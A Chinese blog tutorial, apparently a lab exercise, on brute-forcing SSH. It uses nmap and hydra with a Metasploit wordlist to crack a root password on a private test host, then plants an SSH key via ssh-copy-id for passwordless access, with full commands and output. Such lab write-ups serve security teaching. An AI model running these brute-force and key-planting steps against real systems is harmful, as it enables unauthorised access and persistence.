Linux之SSH服务爆破
一、ssh 密码破解
1.查看RedHat Linux的版本信息
[root@ping ~]# cat /proc/version Linux version 2.6.32-573.el6.x86_64 (mockbuild@x86-027.build.eng.bos.redhat.com) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-16) (GCC) ) #1 SMP Wed Jul 1 18:23:37 EDT 2015
2.查看Kali Linux的版本信息
root@kali:~# cat /proc/version Linux version 4.9.0-kali4-amd64 (devel@kali.org) (gcc version 6.3.0 20170415 (Debian 6.3.0-14) ) #1 SMP Debian 4.9.25-1kali1 (2017-05-04)
3.查看RedHat Linux网卡的IP地址
[root@ping ~]# ifconfig eth0
eth0 Link encap:Ethernet HWaddr 52:54:00:1C:25:4A
inet addr:192.168.100.5 Bcast:192.168.100.255 Mask:255.255.255.0
inet6 addr: fe80::5054:ff:fe1c:254a/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:217 errors:0 dropped:0 overruns:0 frame:0
TX packets:76 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:17149 (16.7 KiB) TX bytes:9661 (9.4 KiB)
4.查看Kali Linux网卡的IP地址
root@kali:~# ifconfig virbr1
virbr1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.100.1 netmask 255.255.255.0 broadcast 192.168.100.255
ether 52:54:00:4a:8c:c8 txqueuelen 1000 (Ethernet)
RX packets 79 bytes 9385 (9.1 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 102 bytes 10949 (10.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
5.查看kali是否可以连接RedHat Linux的SSH服务
root@kali:~# telnet 192.168.100.5 22 Trying 192.168.100.5... Connected to 192.168.100.5. Escape character is '^]'. SSH-2.0-OpenSSH_5.3
6.查看RedHat Linux的22端口是否开启
root@kali:~# nmap -p 22 192.168.100.5 Starting Nmap 7.40 ( https://nmap.org ) at 2018-03-13 20:15 UTC Nmap scan report for www.ping.cn (192.168.100.5) Host is up (0.00025s latency). PORT STATE SERVICE 22/tcp open ssh MAC Address: 52:54:00:1C:25:4A (QEMU virtual NIC)
7.在Kali下默认有爆破的字典
root@kali:~# cat /usr/share/wordlists/metasploit/unix_passwords.txt | wc -l 1008
8.hydra工具,指定用户名是root,爆破的字典,和ssh服务
root@kali:~# hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh://192.168.100.5 Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2018-03-13 20:26:11 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 64 tasks, 1008 login tries (l:1/p:1008), ~0 tries per task [DATA] attacking service ssh on port 22 [22][ssh] host: 192.168.100.5 login: root password: 123456 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2018-03-13 20:26:14
8.登录RedHat Linux查看安全日志信息
root@kali:~/.ssh# ssh root@192.168.100.5 [root@ping ~]# cat /var/log/secure | grep "Failed password" | wc -l 21
二、SSH服务免密码登录
1.创建私钥
root@kali:~# ssh-keygen Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /root/.ssh/id_rsa. Your public key has been saved in /root/.ssh/id_rsa.pub. The key fingerprint is: SHA256:J3puYy3569PnEYHvygLvfSHTkcBZdnz63G/PsTsqYPU root@kali The key's randomart image is: +---[RSA 2048]----+ | . oo..| | +o .o| | ...o.| | . .+. | | S o ..o+.| | ..= oEo.+| | . o=.. ooo.| | o* =+..o+=| | o.*=+==o+*| +----[SHA256]-----+
2.查看私钥文件
root@kali:~# cd .ssh/ root@kali:~/.ssh# ls id_rsa id_rsa.pub known_hosts
3.本地主机的公钥复制到远程主机的用户家目录下,并创建一个隐藏目录
root@kali:~# ssh-copy-id root@192.168.100.5 /usr/bin/ssh-copy-id: INFO: attempting to log in with the new key(s), to filter out any that are already installed /usr/bin/ssh-copy-id: INFO: 1 key(s) remain to be installed -- if you are prompted now it is to install the new keys root@192.168.100.5's password:
4.使用ssh客户端工具登录到RedHat上
root@kali:~/.ssh# ssh root@192.168.100.5 Last login: Wed Mar 14 04:24:29 2018 from 192.168.100.1 [root@ping ~]# uname -m x86_64
5.查看公钥文件
[root@ping .ssh]# ls authorized_keys
浙公网安备 33010602011771号